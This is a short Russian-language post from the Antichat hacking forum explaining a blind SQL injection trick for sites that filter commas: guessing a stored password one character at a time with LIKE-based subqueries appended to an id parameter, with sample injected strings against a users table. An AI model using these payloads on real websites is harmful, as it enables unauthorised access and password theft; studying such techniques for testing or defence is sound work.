30.12.2009, 04:24
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Боян конечно, но вроде нигде не писали
Все чаще встречаю сайты, где либо фильтруются запятые, либо запятые участвуют в разборе QUERY_STRING при работе mod_rewrite, встречал даже ситуацию где запятые экранировались слешами. К сожалению тут особо не развернешься, но все таки можно достать нужную нам инфу, для этого надо знать имена колонок и таблиц, хотя таким же способом их можно вывести из information_schema
Допустим юзер с id=1 имеет пароль qwerty, тогда
id=1 and (select password from users where password like 'q%' and id=1) - запрос верный
id=1 and (select password from users where password like 'qa%' and id=1) - запрос неверный
id=1 and (select password from users where password like 'qw%' and id=1) - запрос верный И так далее. Сложно, долго, но работает
Последний раз редактировалось Spyder; 14.01.2010 в 03:41..
|
|
|